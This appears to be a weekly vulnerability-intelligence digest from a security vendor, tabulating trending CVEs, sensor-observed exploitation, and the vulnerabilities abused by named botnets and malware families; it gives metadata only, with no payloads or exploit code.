Executive Summary
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
| CVE-ID | Type of vulnerability | Severity | CVSS | Affected Product | Exploited-in-Wild | EPSS score | CISA-KEV | Zero-day | OSS |
|---|
| CVE-2024-0769 | Command Injection | Critical | 9.8 | D-Link DIR-859 1.06B01 | True | 0.00212 | False | False | False |
| CVE-2024-20399 | OS Command Injection | Medium | 6.7 | Cisco NX-OS | True | 0.02252 | True | True | False |
| CVE-2024-6387 | Race Condition | High | 8.1 | OpenSSH's server (sshd) | True | 0.00046 | False | False | True |
| CVE-2024-39891 | Unauthenticated Endpoint | Medium | 5.3 | Twilio Authy API | True | 0.00045 | False | False | False |
| CVE-2024-38366 | Remote Code Execution | Critical | 10.0 | CocoaPods Trunk | False | 0.00045 | False | False | True |
| CVE-2024-23692 | Template injection | Critical | 9.8 | Rejetto HTTP File Server | True | 0.0021 | False | False | False |
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.
| Vulnerabilities | Product | Severity | Title | Exploited-in-Wild | CISA KEV |
|---|
| CVE-2024-3400 | PaloAlto Networks PAN-OS | Critical | Command Injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True |
| CVE-2024-29973 | Zyxel NAS326 and NAS542 devices | Critical | Command Injection vulnerability in "setCookie" parameter in Zyxel NAS326 and NAS542 devices | False | False |
| CVE-2024-22729 | NETIS SYSTEMS MW5360 V1.0.1.3031 | Critical | Command injection vulnerability in NETIS SYSTEMS MW5360 V1.0.1.3031 via the password parameter on the login page | False | False |
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.
| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|
| CVE-2018-10562 | Gpon Home Router | Command Injection vulnerability in Gpon home router | True | Zergeca, Zerobot, LiquorBot, Mirai, Gafgyt |
| CVE-2017-17215 | Huawei HG532 | Remote code execution vulnerability in Huawei HG532 router | True | HinataBot, Zerobot, Mirai, Bashlite, Tsunami, Gitpaste, Beastmode, Enemybot, PerlBot, Zergeca, Ircbot |
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.
| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|
| CVE-2024-20399 | Medium | OS Command Injection vulnerability in the CLI of Cisco NX_OS | True | Velvet Ant | False |
| CVE-2024-23692 | Critical | Template Injection vulnerability in Rejetto HTTP File Server up to 2.3m version | False | CoinMiner, XMRig, LemonDuck, XenoRAT | False |
PRE-NVD observed for this week
It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
